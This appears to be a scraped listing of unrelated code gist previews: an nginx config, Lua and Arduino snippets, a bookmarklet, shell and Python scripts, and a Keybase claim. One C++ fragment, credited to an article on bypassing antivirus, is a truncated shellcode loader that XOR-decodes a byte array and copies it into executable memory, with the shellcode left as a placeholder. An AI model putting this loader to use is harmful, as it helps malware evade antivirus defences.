- plaintext xor /dev/urandom
- Ciphertext xor /dev/urandom
- Retry until plaintext matches valid english words
- hope that it is correct
| -- Imports | |
| local component = require("component") | |
| local sides = require("sides") | |
| local gpu = component.gpu | |
| local w, h = gpu.getResolution() | |
| -- Vars | |
| local card = component.proxy(component.list("redstone")()) | |
| local cardUUID = card.address | |
| local outputSide = sides.east |
| server { | |
| listen 443 ssl http2; | |
| server_name github.xirion.net; | |
| ssl_certificate /etc/letsencrypt/live/xirion.net/fullchain.pem; | |
| ssl_certificate_key /etc/letsencrypt/live/xirion.net/privkey.pem; | |
| ssl_dhparam /etc/ssl/certs/dhparam.pem; |
| #!/usr/bin/env python3 | |
| import math | |
| i = int(not False) | |
| while True: | |
| k = i | |
| r = i - k | |
| z = int((math.e ** (math.pi * 1j)).real) | |
| g = int(str(int(z * z)) + str(r)) | |
| while i: | |
| r, i = r + i % g, i // g |
| javascript: (function() { | |
| document.querySelector('video').playbackRate = prompt("Speed multiplier?") | |
| })(); |
| #!/usr/bin/env python3 | |
| # -*- coding: utf-8 -*- | |
| import apt | |
| import apt_pkg | |
| from time import strftime | |
| import os | |
| import subprocess | |
| import sys |
I hereby claim:
To claim this, I am signing this object:
| /* | |
| A 'Dodge the things game' using the LiquidCrystal Library | |
| By: | |
| Quirijn | |
| Victor | |
| */ | |
| // include the library code: | |
| #include <LiquidCrystal.h> |
| /* source: http://www.attactics.org/2016/03/bypassing-antivirus-with-10-lines-of.html */ | |
| #include <windows.h> | |
| #include <iostream> | |
| int main(int argc, char **argv) { | |
| char b[] = {/* your XORd with key of 'x' shellcode goes here i.e. 0x4C,0x4F, 0x4C */}; | |
| char c[sizeof b]; | |
| for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ 'x';} | |
| void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE); | |
| memcpy(exec, c, sizeof c); |
| #!/bin/sh | |
| # | |
| # z3bra - (c) wtfpl 2014 | |
| usage () { | |
| cat <<EOF | |
| usage: $(basename $0) [-hp] | |
| -h : print help | |
| -p : percentage of cpu used (default) | |
| -n : number of running processes |